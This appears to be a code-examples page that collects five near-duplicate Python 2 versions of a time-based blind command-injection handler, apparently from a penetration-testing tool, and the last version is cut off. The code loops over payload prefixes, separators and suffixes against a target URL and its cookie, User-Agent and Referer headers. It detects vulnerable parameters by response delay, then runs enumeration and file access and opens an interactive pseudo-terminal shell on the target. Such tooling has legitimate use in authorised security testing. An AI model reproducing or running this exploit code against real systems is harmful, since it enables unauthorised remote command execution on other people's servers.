Esempio n. 1
0
def tb_injection_handler(url, delay, filename, http_request_method, url_time_response):

  percent = 0
  counter = 1
  num_of_chars = 1
  vp_flag = True
  no_result = True
  is_encoded = False
  export_injection_info = False

  injection_type = "Blind-based Command Injection"
  technique = "time-based injection technique"

  # Check if defined "--maxlen" option.
  if menu.options.maxlen:
    maxlen = settings.MAXLEN
    
  # Check if defined "--url-reload" option.
  if menu.options.url_reload == True:
    print Fore.YELLOW + "(^) Warning: The '--url-reload' option is not available in "+ technique +"." + Style.RESET_ALL
  
  percent = str(percent)+"%"
  sys.stdout.write("\r(*) Testing the "+ technique + "... " +  "[ " + percent + " ]")  
  sys.stdout.flush()

  # Calculate all possible combinations
  total = (len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) - len(settings.JUNK_COMBINATION))

  for prefix in settings.PREFIXES:
    for suffix in settings.SUFFIXES:
      for separator in settings.SEPARATORS:
        num_of_chars = num_of_chars + 1
        
        # Check for bad combination of prefix and separator
        combination = prefix + separator
        if combination in settings.JUNK_COMBINATION:
          prefix = ""
        
        # Define alter shell
        alter_shell = menu.options.alter_shell
        
        # Change TAG on every request to prevent false-positive results.
        TAG = ''.join(random.choice(string.ascii_uppercase) for num_of_chars in range(6))
        tag_length = len(TAG) + 4
        
        for output_length in range(1, int(tag_length)):
          try:
            
            if alter_shell:
              # Time-based decision payload (check if host is vulnerable).
              payload = tb_payloads.decision_alter_shell(separator, TAG, output_length, delay, http_request_method)
            else:
              # Time-based decision payload (check if host is vulnerable).
              payload = tb_payloads.decision(separator, TAG, output_length, delay, http_request_method)

            # Fix prefixes / suffixes
            payload = parameters.prefixes(payload, prefix)
            payload = parameters.suffixes(payload, suffix)

            if menu.options.base64:
              payload = base64.b64encode(payload)

            # Check if defined "--verbose" option.
            if menu.options.verbose:
              sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL)

            # Cookie Injection
            if settings.COOKIE_INJECTION == True:
              # Check if target host is vulnerable to cookie injection.
              vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
              how_long = tb_injector.cookie_injection_test(url, vuln_parameter, payload)

            # User-Agent Injection
            elif settings.USER_AGENT_INJECTION == True:
              # Check if target host is vulnerable to user-agent injection.
              vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent)
              how_long = tb_injector.user_agent_injection_test(url, vuln_parameter, payload)

            # Referer Injection
            elif settings.REFERER_INJECTION == True:
              # Check if target host is vulnerable to referer injection.
              vuln_parameter = parameters.specify_referer_parameter(menu.options.referer)
              how_long = tb_injector.referer_injection_test(url, vuln_parameter, payload)

            else:
              # Check if target host is vulnerable.
              how_long, vuln_parameter = tb_injector.injection_test(payload, http_request_method, url)

            # Injection percentage calculation
            percent = ((num_of_chars * 100) / total)
            float_percent = "{0:.1f}".format(round(((num_of_chars*100)/(total * 1.0)),2))

            if percent == 100 and no_result == True:
              if not menu.options.verbose:
                percent = Fore.RED + "FAILED" + Style.RESET_ALL
              else:
                percent = ""
                
            else:
              if (url_time_response <= 1 and how_long >= delay) or \
              (url_time_response >= 2 and how_long > delay):

                # Time relative false positive fixation.
                if len(TAG) == output_length:
                  randv1 = random.randrange(0, 1)
                  randv2 = random.randrange(1, 2)
                  randvcalc = randv1 + randv2
                  cmd = "(" + str(randv1) + "+" + str(randv2) + ")"
                  # Check for false positive resutls
                  output = tb_injector.false_positive_check(separator, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, randvcalc, alter_shell)
                  
                if str(output) == str(randvcalc) and len(TAG) == output_length:
                  if not menu.options.verbose:
                    percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
                  else:
                    percent = ""
                else:
                  break
                  
              else:
                percent = str(float_percent)+"%"
                
            if not menu.options.verbose:
              sys.stdout.write("\r(*) Testing the "+ technique + "... " +  "[ " + percent + " ]")  
              sys.stdout.flush()

          except KeyboardInterrupt: 
            raise
        
          except:
            break
          
          # Yaw, got shellz! 
          # Do some magic tricks!
          if (url_time_response <= 1 and how_long >= delay) or \
          (url_time_response >= 2 and how_long > delay):

            if len(TAG) == output_length :
              found = True
              no_result = False

              if settings.COOKIE_INJECTION == True: 
                header_name = " Cookie"
                found_vuln_parameter = vuln_parameter
                the_type = " HTTP header"

              elif settings.USER_AGENT_INJECTION == True: 
                header_name = " User-Agent"
                found_vuln_parameter = ""
                the_type = " HTTP header"

              elif settings.REFERER_INJECTION == True: 
                header_name = " Referer"
                found_vuln_parameter = ""
                the_type = " HTTP header"
                
              else:
                header_name = ""
                the_type = " parameter"
                if http_request_method == "GET":
                  found_vuln_parameter = parameters.vuln_GET_param(url)
                else :
                  found_vuln_parameter = vuln_parameter

              if len(found_vuln_parameter) != 0 :
                found_vuln_parameter = " '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL  + Style.BRIGHT + "'" 
              
              # Print the findings to log file.
              if export_injection_info == False:
                export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
              if vp_flag == True:
                vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload)
              logs.upload_payload(filename, counter, payload) 
              counter = counter + 1
              
              # Print the findings to terminal.
              print Style.BRIGHT + "\n(!) The ("+ http_request_method + ")" + found_vuln_parameter + header_name + the_type + " is vulnerable to "+ injection_type + "." + Style.RESET_ALL
              print "  (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + ""
              print "  (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
              print "  (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", payload.replace("\n", "\\n")) + Style.RESET_ALL

              # Check for any enumeration options.
              if settings.ENUMERATION_DONE == True :
                while True:
                  enumerate_again = raw_input("\n(?) Do you want to enumerate again? [Y/n/q] > ").lower()
                  if enumerate_again in settings.CHOISE_YES:
                    tb_enumeration.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell)
                    break
                  elif enumerate_again in settings.CHOISE_NO: 
                    break
                  elif enumerate_again in settings.CHOISE_QUIT:
                    sys.exit(0)
                  else:
                    if enumerate_again == "":
                      enumerate_again = "enter"
                    print Back.RED + "(x) Error: '" + enumerate_again + "' is not a valid answer." + Style.RESET_ALL
                    pass
              else:
                tb_enumeration.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell)

              # Check for any system file access options.
              if settings.FILE_ACCESS_DONE == True :
                while True:
                  file_access_again = raw_input("(?) Do you want to access files again? [Y/n/q] > ").lower()
                  if file_access_again in settings.CHOISE_YES:
                    print ""
                    tb_file_access.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell)
                    break
                  elif file_access_again in settings.CHOISE_NO: 
                    break
                  elif file_access_again in settings.CHOISE_QUIT:
                    sys.exit(0)
                  else:
                    if file_access_again == "":
                      file_access_again = "enter"
                    print Back.RED + "(x) Error: '" + file_access_again  + "' is not a valid answer." + Style.RESET_ALL
                    pass
              else:
                tb_file_access.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell)
              
              # Check if defined single cmd.
              if menu.options.os_cmd:
                cmd = menu.options.os_cmd
                check_how_long, output = tb_enumeration.single_os_cmd_exec(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell)
                # Exploirt injection result
                tb_injector.export_injection_results(cmd, separator, output, check_how_long)
                sys.exit(0)

              # Pseudo-Terminal shell
              go_back = False
              while True:
                if go_back == True:
                  break
                gotshell = raw_input("(?) Do you want a Pseudo-Terminal shell? [Y/n/q] > ").lower()
                if gotshell in settings.CHOISE_YES:
                  print ""
                  print "Pseudo-Terminal (type '?' for shell options)"
                  while True:
                    try:
                      cmd = raw_input("Shell > ")
                      if cmd.lower() in settings.SHELL_OPTIONS:
                        if cmd == "?":
                          menu.shell_options()
                          continue
                        elif cmd.lower() == "quit":
                          sys.exit(0)
                        elif cmd.lower() == "back":
                          go_back = True
                          if checks.check_next_attack_vector(technique, go_back) == True:
                            break
                          else:
                            if no_result == True:
                              return False 
                            else:
                              return True  
                        else:
                          pass
                        
                      else:
                        # The main command injection exploitation.
                        check_how_long, output = tb_injector.injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell)
                        # Exploirt injection result
                        tb_injector.export_injection_results(cmd, separator, output, check_how_long)
                        print ""
                    except KeyboardInterrupt: 
                      raise
                  
                elif gotshell in settings.CHOISE_NO:
                  if checks.check_next_attack_vector(technique, go_back) == True:
                    break
                  else:
                    if no_result == True:
                      return False 
                    else:
                      return True  
                      
                elif gotshell in settings.CHOISE_QUIT:
                  sys.exit(0)

                else:
                  if gotshell == "":
                    gotshell = "enter"
                  print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
                  pass
            
            break
          
  if no_result == True:
    print ""
    return False

  else :
    sys.stdout.write("\r")
    sys.stdout.flush()
Esempio n. 2
0
def tb_injection_handler(url, delay, filename, http_request_method):

    num_of_chars = 0
    counter = 0
    vp_flag = True
    no_result = True
    is_encoded = False
    fixation = False
    export_injection_info = False
    injection_type = "Blind-based Command Injection"
    technique = "time-based injection technique"

    # Check if defined "--maxlen" option.
    if menu.options.maxlen:
        maxlen = menu.options.maxlen

    # Check if defined "--url-reload" option.
    if menu.options.url_reload == True:
        print Back.RED + "(x) Error: The '--url-reload' option is not available in " + technique + "!" + Style.RESET_ALL

    # Calculate all possible combinations
    total = (len(settings.PREFIXES) * len(settings.SEPARATORS) *
             len(settings.SUFFIXES) - len(settings.JUNK_COMBINATION))

    # Estimating the response time (in seconds)
    request = urllib2.Request(url)
    headers.do_check(request)
    start = time.time()
    response = urllib2.urlopen(request)
    response.read(1)
    response.close()
    end = time.time()
    diff = end - start
    url_time_response = int(diff)
    if url_time_response != 0:
        print Style.BRIGHT + "(!) The estimated response time is " + str(
            url_time_response) + " second" + "s"[url_time_response ==
                                                 1:] + "." + Style.RESET_ALL
    delay = int(delay) + int(url_time_response)

    for prefix in settings.PREFIXES:
        for suffix in settings.SUFFIXES:
            for separator in settings.SEPARATORS:
                num_of_chars = num_of_chars + 1

                # Check for bad combination of prefix and separator
                combination = prefix + separator
                if combination in settings.JUNK_COMBINATION:
                    prefix = ""

                # Define alter shell
                alter_shell = menu.options.alter_shell

                # Change TAG on every request to prevent false-positive results.
                TAG = ''.join(
                    random.choice(string.ascii_uppercase)
                    for num_of_chars in range(6))
                tag_length = len(TAG) + 4

                for output_length in range(1, int(tag_length)):
                    try:

                        if alter_shell:
                            # Time-based decision payload (check if host is vulnerable).
                            payload = tb_payloads.decision_alter_shell(
                                separator, TAG, output_length, delay,
                                http_request_method)
                        else:
                            # Time-based decision payload (check if host is vulnerable).
                            payload = tb_payloads.decision(
                                separator, TAG, output_length, delay,
                                http_request_method)

                        # Check if defined "--prefix" option.
                        if menu.options.prefix:
                            prefix = menu.options.prefix
                            payload = prefix + payload
                        else:
                            payload = prefix + payload

                        # Check if defined "--suffix" option.
                        if menu.options.suffix:
                            suffix = menu.options.suffix
                            payload = payload + suffix
                        else:
                            payload = payload + suffix

                        # Check if defined "--verbose" option.
                        if menu.options.verbose:
                            sys.stdout.write("\n" + Fore.GREY +
                                             payload.replace("\n", "\\n") +
                                             Style.RESET_ALL)

                        # Check if target host is vulnerable.
                        how_long, vuln_parameter = tb_injector.injection_test(
                            payload, http_request_method, url)
                        if not menu.options.verbose:
                            percent = ((num_of_chars * 100) / total)
                            if how_long >= delay:
                                percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
                            elif percent == 100:
                                if no_result == True:
                                    percent = Fore.RED + "FAILED" + Style.RESET_ALL
                                else:
                                    percent = str(percent) + "%"
                            else:
                                percent = str(percent) + "%"
                            sys.stdout.write("\r(*) Testing the " + technique +
                                             "... " + "[ " + percent + " ]")
                            sys.stdout.flush()

                    except KeyboardInterrupt:
                        raise

                    except:
                        break

                    # Yaw, got shellz!
                    # Do some magic tricks!
                    if how_long >= delay:
                        # Time relative false positive fixation.
                        if len(TAG) == output_length:
                            if fixation == True:
                                delay = delay + 1
                        else:
                            fixation = True
                            continue

                        # Print the findings to log file.
                        if export_injection_info == False:
                            output_file = open(filename + ".txt", "a")
                            output_file.write("\n(+) Type : " + injection_type)
                            output_file.write("\n(+) Technique : " +
                                              technique.title())
                            output_file.close()
                            export_injection_info = True

                        if http_request_method == "GET":
                            # Print the findings to log file
                            if vp_flag == True:
                                output_file = open(filename + ".txt", "a")
                                output_file.write("\n(+) Parameter : " +
                                                  vuln_parameter + " (" +
                                                  http_request_method + ")")
                                output_file.write("\n")
                                vp_flag = False
                                output_file.close()

                            counter = counter + 1
                            output_file = open(filename + ".txt", "a")
                            output_file.write("  (" + str(counter) +
                                              ") Payload : " +
                                              re.sub("%20", " ", payload) +
                                              "\n")
                            output_file.close()

                            #Vulnerable Parameter
                            GET_vuln_param = parameters.vuln_GET_param(url)

                            # Print the findings to terminal.
                            print Style.BRIGHT + "\n(!) The (" + http_request_method + ") '" + Style.UNDERLINE + GET_vuln_param + Style.RESET_ALL + Style.BRIGHT + "' parameter is vulnerable to " + injection_type + "." + Style.RESET_ALL
                            print "  (+) Type : " + Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + ""
                            print "  (+) Technique : " + Fore.YELLOW + Style.BRIGHT + technique.title(
                            ) + Style.RESET_ALL + ""
                            print "  (+) Payload : " + Fore.YELLOW + Style.BRIGHT + re.sub(
                                "%20", " ",
                                urllib.unquote_plus(
                                    payload.replace("\n",
                                                    "\\n"))) + Style.RESET_ALL

                        else:
                            # Print the findings to log file
                            if vp_flag == True:
                                output_file = open(filename + ".txt", "a")
                                output_file.write("\n(+) Parameter : " +
                                                  vuln_parameter + " (" +
                                                  http_request_method + ")")
                                output_file.write("\n")
                                vp_flag = False
                                output_file.close()

                            counter = counter + 1
                            output_file = open(filename + ".txt", "a")
                            output_file.write("  (" + str(counter) +
                                              ") Payload : " +
                                              re.sub("%20", " ", payload) +
                                              "\n")
                            output_file.close()

                            #Vulnerable Parameter
                            POST_vuln_param = vuln_parameter

                            # Print the findings to terminal.
                            print Style.BRIGHT + "\n(!) The (" + http_request_method + ") '" + Style.UNDERLINE + POST_vuln_param + Style.RESET_ALL + Style.BRIGHT + "' parameter is vulnerable to " + injection_type + "." + Style.RESET_ALL
                            print "  (+) Type : " + Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + ""
                            print "  (+) Technique : " + Fore.YELLOW + Style.BRIGHT + technique.title(
                            ) + Style.RESET_ALL + ""
                            print "  (+) Payload : " + Fore.YELLOW + Style.BRIGHT + re.sub(
                                "%20", " ", payload.replace(
                                    "\n", "\\n")) + Style.RESET_ALL

                        # Check for any enumeration options.
                        tb_enumeration.do_check(separator, maxlen, TAG, prefix,
                                                suffix, delay,
                                                http_request_method, url,
                                                vuln_parameter, alter_shell)

                        # Check for any system file access options.
                        tb_file_access.do_check(separator, maxlen, TAG, prefix,
                                                suffix, delay,
                                                http_request_method, url,
                                                vuln_parameter, alter_shell)

                        # Pseudo-Terminal shell
                        while True:
                            gotshell = raw_input(
                                "\n(?) Do you want a Pseudo-Terminal shell? [Y/n] > "
                            ).lower()
                            if gotshell in settings.CHOISE_YES:
                                print ""
                                print "Pseudo-Terminal (type 'q' or use <Ctrl-C> to quit)"
                                while True:
                                    try:
                                        cmd = raw_input("Shell > ")
                                        if cmd == "q":
                                            sys.exit(0)

                                        else:
                                            # The main command injection exploitation.
                                            check_how_long, output = tb_injector.injection(
                                                separator, maxlen, TAG, cmd,
                                                prefix, suffix, delay,
                                                http_request_method, url,
                                                vuln_parameter, alter_shell)

                                        if menu.options.verbose:
                                            print ""
                                        if output != "" and check_how_long != 0:
                                            print "\n\n" + Fore.GREEN + Style.BRIGHT + output + Style.RESET_ALL
                                            print "\n(*) Finished in " + time.strftime(
                                                '%H:%M:%S',
                                                time.gmtime(
                                                    check_how_long)) + ".\n"
                                        else:
                                            print ""

                                    except KeyboardInterrupt:
                                        print ""
                                        sys.exit(0)

                            elif gotshell in settings.CHOISE_NO:
                                break
                                if menu.options.verbose:
                                    sys.stdout.write(
                                        "\r(*) Continue testing the " +
                                        technique + "... ")
                                    sys.stdout.flush()

                            else:
                                if gotshell == "":
                                    gotshell = "enter"
                                print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
                                pass

                        break

    if no_result == True:
        if menu.options.verbose == False:
            print ""
            return False
        else:
            print ""
            return False
    else:
        sys.stdout.write("\r")
        sys.stdout.flush()
Esempio n. 3
0
def tb_injection_handler(url, delay, filename, http_request_method):
        
  num_of_chars = 1
  counter = 0
  vp_flag = True
  no_result = True
  is_encoded = False
  fixation = False
  export_injection_info = False

  injection_type = "Blind-based Command Injection"
  technique = "time-based injection technique"


  # Check if defined "--maxlen" option.
  if menu.options.maxlen:
    maxlen = menu.options.maxlen
    
  # Check if defined "--url-reload" option.
  if menu.options.url_reload == True:
    print Back.RED + "(x) Error: The '--url-reload' option is not available in "+ technique +"!" + Style.RESET_ALL

  # Calculate all possible combinations
  total = (len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) - len(settings.JUNK_COMBINATION))
  
  # Estimating the response time (in seconds)
  request = urllib2.Request(url)
  headers.do_check(request)
  start = time.time()
  response = urllib2.urlopen(request)
  response.read(1)
  response.close()
  end = time.time()
  diff = end - start
  url_time_response = int(diff)
  if url_time_response != 0 :
    print Style.BRIGHT + "(!) The estimated response time is " + str(url_time_response) + " second" + "s"[url_time_response == 1:] + "." + Style.RESET_ALL
  delay = int(delay) + int(url_time_response)
  
  sys.stdout.write("(*) Testing the "+ technique + "... ")
  sys.stdout.flush()

  for prefix in settings.PREFIXES:
    for suffix in settings.SUFFIXES:
      for separator in settings.SEPARATORS:
        num_of_chars = num_of_chars + 1
        
        # Check for bad combination of prefix and separator
        combination = prefix + separator
        if combination in settings.JUNK_COMBINATION:
          prefix = ""
        
        # Define alter shell
        alter_shell = menu.options.alter_shell
        
        # Change TAG on every request to prevent false-positive results.
        TAG = ''.join(random.choice(string.ascii_uppercase) for num_of_chars in range(6))
        tag_length = len(TAG) + 4
        
        for output_length in range(1, int(tag_length)):
          try:
            
            if alter_shell:
              # Time-based decision payload (check if host is vulnerable).
              payload = tb_payloads.decision_alter_shell(separator, TAG, output_length, delay, http_request_method)
            else:
              # Time-based decision payload (check if host is vulnerable).
              payload = tb_payloads.decision(separator, TAG, output_length, delay, http_request_method)

            # Fix prefixes / suffixes
            payload = parameters.prefixes(payload, prefix)
            payload = parameters.suffixes(payload, suffix)
              
            # Check if defined "--verbose" option.
            if menu.options.verbose:
              sys.stdout.write("\n" + Fore.GREY + payload.replace("\n", "\\n") + Style.RESET_ALL)

            # Cookie Injection
            if settings.COOKIE_INJECTION == True:
              # Check if target host is vulnerable to cookie injection.
              vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
              how_long = tb_injector.cookie_injection_test(url, vuln_parameter, payload)

            else:
              # Check if target host is vulnerable.
              how_long, vuln_parameter = tb_injector.injection_test(payload, http_request_method, url)

            if not menu.options.verbose:
              percent = ((num_of_chars*100)/total)
              if how_long >= delay:
                percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
              elif percent == 100:
                if no_result == True:
                  percent = Fore.RED + "FAILED" + Style.RESET_ALL
                else:
                    percent = str(percent)+"%"
              else:
                percent = str(percent)+"%"
              sys.stdout.write("\r(*) Testing the "+ technique + "... " +  "[ " + percent + " ]")  
              sys.stdout.flush()
              
          except KeyboardInterrupt: 
            raise
        
          except:
            break
          
          # Yaw, got shellz! 
          # Do some magic tricks!
          if how_long >= delay :
            # Time relative false positive fixation.
            if len(TAG) == output_length :
              if fixation == True:
                delay = delay + 1
            else:
              fixation = True
              continue


            if settings.COOKIE_INJECTION == True: 
              http_request_method = "cookie"
              found_vuln_parameter = vuln_parameter
            else:
              if http_request_method == "GET":
                found_vuln_parameter = parameters.vuln_GET_param(url)
              else :
                found_vuln_parameter = vuln_parameter

            # Print the findings to log file.
            if export_injection_info == False:
              export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
            if vp_flag == True:
              vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload)
            logs.upload_payload(filename, counter, payload) 
            counter = counter + 1
            
            # Print the findings to terminal.
            print Style.BRIGHT + "\n(!) The ("+ http_request_method + ") '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "' parameter is vulnerable to "+ injection_type +"."+ Style.RESET_ALL
            print "  (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + ""
            print "  (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
            print "  (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", urllib.unquote_plus(payload.replace("\n", "\\n"))) + Style.RESET_ALL

            # Check for any enumeration options.
            tb_enumeration.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell)

            # Check for any system file access options.
            tb_file_access.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell)
            
            # Pseudo-Terminal shell
            while True:
              gotshell = raw_input("\n(?) Do you want a Pseudo-Terminal shell? [Y/n] > ").lower()
              if gotshell in settings.CHOISE_YES:
                print ""
                print "Pseudo-Terminal (type 'q' or use <Ctrl-C> to quit)"
                while True:
                  try:
                    cmd = raw_input("Shell > ")
                    if cmd == "q":
                      sys.exit(0)
                      
                    else:
                      # The main command injection exploitation.
                      check_how_long, output  = tb_injector.injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell)

                    if menu.options.verbose:
                      print ""
                    if output != "" and check_how_long != 0 :
                      print "\n\n" + Fore.GREEN + Style.BRIGHT + output + Style.RESET_ALL
                      print "\n(*) Finished in "+ time.strftime('%H:%M:%S', time.gmtime(check_how_long)) +".\n"
                    else:
                      print ""
                      
                  except KeyboardInterrupt: 
                    print ""
                    sys.exit(0)
                
              elif gotshell in settings.CHOISE_NO:
                break
                if menu.options.verbose:
                  sys.stdout.write("\r(*) Continue testing the "+ technique +"... ")
                  sys.stdout.flush()
              
              else:
                if gotshell == "":
                  gotshell = "enter"
                print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
                pass
              
            break
          
  if no_result == True:
    if menu.options.verbose == False:
      print ""
      return False
    else:
      print ""
      return False
  else :
    sys.stdout.write("\r")
    sys.stdout.flush()
Esempio n. 4
0
def tb_injection_handler(url, delay, filename, http_request_method, url_time_response):
  
  counter = 1
  num_of_chars = 1
  vp_flag = True
  no_result = True
  is_encoded = False
  fixation = False
  export_injection_info = False

  injection_type = "Blind-based Command Injection"
  technique = "time-based injection technique"

  # Check if defined "--maxlen" option.
  if menu.options.maxlen:
    maxlen = menu.options.maxlen
    
  # Check if defined "--url-reload" option.
  if menu.options.url_reload == True:
    print Back.RED + "(x) Error: The '--url-reload' option is not available in "+ technique +"!" + Style.RESET_ALL

  # Calculate all possible combinations
  total = (len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) - len(settings.JUNK_COMBINATION))
    
  sys.stdout.write("(*) Testing the "+ technique + "... ")
  sys.stdout.flush()

  for prefix in settings.PREFIXES:
    for suffix in settings.SUFFIXES:
      for separator in settings.SEPARATORS:
        num_of_chars = num_of_chars + 1
        
        # Check for bad combination of prefix and separator
        combination = prefix + separator
        if combination in settings.JUNK_COMBINATION:
          prefix = ""
        
        # Define alter shell
        alter_shell = menu.options.alter_shell
        
        # Change TAG on every request to prevent false-positive results.
        TAG = ''.join(random.choice(string.ascii_uppercase) for num_of_chars in range(6))
        tag_length = len(TAG) + 4
        
        for output_length in range(1, int(tag_length)):
          try:
            
            if alter_shell:
              # Time-based decision payload (check if host is vulnerable).
              payload = tb_payloads.decision_alter_shell(separator, TAG, output_length, delay, http_request_method)
            else:
              # Time-based decision payload (check if host is vulnerable).
              payload = tb_payloads.decision(separator, TAG, output_length, delay, http_request_method)

            # Fix prefixes / suffixes
            payload = parameters.prefixes(payload, prefix)
            payload = parameters.suffixes(payload, suffix)
              
            # Check if defined "--verbose" option.
            if menu.options.verbose:
              sys.stdout.write("\n" + Fore.GREY + payload.replace("\n", "\\n") + Style.RESET_ALL)

            # Cookie Injection
            if settings.COOKIE_INJECTION == True:
              # Check if target host is vulnerable to cookie injection.
              vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
              how_long = tb_injector.cookie_injection_test(url, vuln_parameter, payload)

            else:
              # Check if target host is vulnerable.
              how_long, vuln_parameter = tb_injector.injection_test(payload, http_request_method, url)

            # Injection percentage calculation
            percent = ((num_of_chars * 100) / total)

            if percent == 100 and no_result == True:
              if not menu.options.verbose:
                percent = Fore.RED + "FAILED" + Style.RESET_ALL
              else:
                percent = ""
            else:
              if (url_time_response <= 1 and how_long >= delay) or \
              (url_time_response >= 2 and how_long > delay):

                # Time relative false positive fixation.
                if len(TAG) == output_length :
                  if fixation == True:
                    delay = delay + 1
                else:
                  fixation = True
                  continue

                randv1 = random.randrange(0, 1)
                randv2 = random.randrange(1, 2)
                randvcalc = randv1 + randv2
                cmd = "(" + str(randv1) + "+" + str(randv2) + ")"
                output = tb_injector.false_positive_check(separator, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, randvcalc, alter_shell)
                
                if str(output) == str(randvcalc):
                  if not menu.options.verbose:
                    percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
                  else:
                    percent = ""
              else:
                percent = str(percent)+"%"
                
            if not menu.options.verbose:
              sys.stdout.write("\r(*) Testing the "+ technique + "... " +  "[ " + percent + " ]")  
              sys.stdout.flush()

          except KeyboardInterrupt: 
            raise
        
          except:
            break
          
          # Yaw, got shellz! 
          # Do some magic tricks!
          if (url_time_response <= 1 and how_long >= delay) or \
          (url_time_response >= 2 and how_long > delay):

            if len(TAG) == output_length :
              found = True
              no_result = False

              if settings.COOKIE_INJECTION == True: 
                http_request_method = "cookie"
                found_vuln_parameter = vuln_parameter
              else:
                if http_request_method == "GET":
                  found_vuln_parameter = parameters.vuln_GET_param(url)
                else :
                  found_vuln_parameter = vuln_parameter

              # Print the findings to log file.
              if export_injection_info == False:
                export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
              if vp_flag == True:
                vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload)
              logs.upload_payload(filename, counter, payload) 
              counter = counter + 1
              
              # Print the findings to terminal.
              print Style.BRIGHT + "\n(!) The ("+ http_request_method + ") '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "' parameter is vulnerable to "+ injection_type +"."+ Style.RESET_ALL
              print "  (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + ""
              print "  (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
              print "  (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", urllib.unquote_plus(payload.replace("\n", "\\n"))) + Style.RESET_ALL

              # Check for any enumeration options.
              tb_enumeration.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell)

              # Check for any system file access options.
              tb_file_access.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell)
              
              # Pseudo-Terminal shell
              while True:
                gotshell = raw_input("\n(?) Do you want a Pseudo-Terminal shell? [Y/n] > ").lower()
                if gotshell in settings.CHOISE_YES:
                  print ""
                  print "Pseudo-Terminal (type 'q' or use <Ctrl-C> to quit)"
                  while True:
                    try:
                      cmd = raw_input("Shell > ")
                      if cmd == "q":
                        logs.logs_notification(filename)
                        sys.exit(0)
                        
                      else:
                        # The main command injection exploitation.
                        check_how_long, output  = tb_injector.injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell)

                      if menu.options.verbose:
                        print ""
                      if output != "" and check_how_long != 0 :
                        print "\n\n" + Fore.GREEN + Style.BRIGHT + output + Style.RESET_ALL
                        print "\n(*) Finished in "+ time.strftime('%H:%M:%S', time.gmtime(check_how_long)) +".\n"
                      else:
                        print ""
                        
                    except KeyboardInterrupt: 
                      raise
                  
                elif gotshell in settings.CHOISE_NO:
                  break
                  if menu.options.verbose:
                    sys.stdout.write("\r(*) Continue testing the "+ technique +"... ")
                    sys.stdout.flush()
                
                else:
                  if gotshell == "":
                    gotshell = "enter"
                  print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
                  pass
            
            break
          
  if no_result == True:
    print ""
    return False

  else :
    sys.stdout.write("\r")
    sys.stdout.flush()
Esempio n. 5
0
def tb_injection_handler(url, delay, filename, http_request_method, url_time_response):

  percent = 0
  counter = 1
  num_of_chars = 1
  vp_flag = True
  no_result = True
  is_encoded = False
  export_injection_info = False

  injection_type = "Blind-based Command Injection"
  technique = "time-based injection technique"

  # Check if defined "--maxlen" option.
  if menu.options.maxlen:
    maxlen = menu.options.maxlen
    
  # Check if defined "--url-reload" option.
  if menu.options.url_reload == True:
    print Back.RED + "(x) Error: The '--url-reload' option is not available in "+ technique +"!" + Style.RESET_ALL

  # Calculate all possible combinations
